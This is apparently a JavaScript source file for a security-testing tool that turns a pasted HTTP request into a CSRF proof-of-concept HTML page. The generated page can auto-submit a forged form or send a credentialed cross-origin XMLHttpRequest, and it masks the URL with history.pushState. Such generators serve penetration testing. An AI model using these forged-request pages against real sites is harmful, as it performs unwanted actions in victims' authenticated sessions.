$("#generate").click(function() {
	// Getting the request and getting header lines accordingly 
	var request = $("#request").val();
	var headerLines = request.split("\n");

	var requestParts = {};
	var parameters = new Array();

	// POST or GET
	requestParts.method = headerLines[0].split(" ")[0]; 

	// Getting the data
	if(requestParts.method == "POST") {
		var i = headerLines.length;
		while(!headerLines[i]){							
			requestParts.data = headerLines[i-1];
			i--;
		}
		parameters = requestParts.data.split("&");
	}
	else if(requestParts.method == "GET") {
		// Is there a data exist?
		try{
			parameters = headerLines[0].split(" ")[1].split("?")[1].split("&");
		}
		catch{
			parameters = [];
		}
	}
	else{
		// Only POST and GET avaible at this time
		requestParts.method = "UNKNOWN";
	}

	// Getting the path, header, uri, protocol, host
	for (var i = 0; i < headerLines.length; i++) {
		if(!headerLines[i]) break;
		if(i==0){
			requestParts.path = headerLines[i].split(" ")[1];
		}
		requestParts.header = headerLines[i].split(":")[0];
		if(requestParts.header == "Host") {
			if($('#https')[0].checked) { 
				requestParts.uri = "https://" + headerLines[i].split(": ")[1];
				requestParts.protocol = "https";
			}
			else if(!$('#https')[0].checked){
				requestParts.uri = "http://" + headerLines[i].split(": ")[1];
				requestParts.protocol = "http";
			}
			requestParts.host = headerLines[i].split(": ")[1];
			break;
		}
	}	
	$("#generatedForm").val(generateCSRFPoSForm(requestParts, parameters));
});

function generateCSRFPoSForm(generate, parameters) {
	// "username=selm4nkon" --> "username\" value=\"selm4nkon", for line 109
	var tempParameterList = new Array();
	for (var i = 0; i < parameters.length; i++) {
		tempParameterList[i] = parameters[i].split("=")[0] + "\" value=\"" + parameters[i].split("=")[1];
	}

	// Setting to path
	var pushStatePath = ($("#pushStatePath").val()) ? $("#pushStatePath").val() : "/";

	// Generating CSRF PoC Form 
	var result = "<!-- Generated by PoCGenerator26 -->\n";
	result += "<html>\n";
	result += "  <body>\n";
	result += "    <script>history.pushState('', '', '" + pushStatePath + "')</script>\n";
	// Cross-domain XHR
	if($('#crossDomain')[0].checked){
		result += "    <script>\n";
		result += "      function submitRequest(){\n";
		result += "         var xhr = new XMLHttpRequest();\n";
		result += "         xhr.open(\"";
		result += generate.method + "\", \"" + generate.protocol + ":\\/\\/" + generate.host + "\\" +  generate.path[0]; 
		for (let i = 1; i < generate.path.split("/").length; i++) {
			if (i != 1) result += "/";
			result += generate.path.split("/")[i];
			if (i != generate.path.split("/").length - 1) result += "\\";
		}
		result += "\", true);\n";
		if(generate.method=="POST"){
			result += "         xhr.setRequestHeader(\"Content-Type\", \"application\\/x-www-form-urlencoded\");\n";
			result += "         var body = \"" + generate.data + "\";\n";
		}
		else if(generate.method=="GET"){
			result += "         var body = \"\";\n";			
		}
		result += "         xhr.withCredentials = true;\n";
		result += "         var aBody = new Uint8Array(body.length);\n";
		result += "         for (var i = 0; i < aBody.length; i++) aBody[i] = body.charCodeAt(i);\n";
		result += "         xhr.send(new Blob([aBody]));\n";
		result += "       }\n";
		result += "    </script>\n";
		result += "    <form action=\"#\">\n";
		result += "      <input type=\"button\" value=\"Submit request\" onclick=\"submitRequest();\" />\n";
		result += "    </form>\n";
	}
	// Non Cross-domain XHR
	else{
		result += "    <form action=\"" + generate.uri + generate.path + "\"";
		result += (generate.method=="POST") ? " method=\"" + generate.method + "\">\n" :">\n";
		// Getting parameters 
		for (var i = 0; i < parameters.length; i++) {
			result += "      <input type=\"hidden\" name=\"" + tempParameterList[i] + "\"/>\n"	
		}
		result += "      <input type=\"submit\" value=\"Submit\">\n";
		result += "    </form>\n";
		// Auto-submit include
		if ($('#autoSubmit')[0].checked) { 
			result += "    <script>document.forms[0].submit();</script>\n";
		}
	}
	result += "  </body>\n";	
	result += "</html>\n";

	// Errors
	if (generate.method =="UNKNOWN"){
		result = "Unknown method.\nOnly POST and GET methods avaible at this time."
	}
	if (!tempParameterList.length){
		result = "There is no data to generate a form."
	}

	return result;
}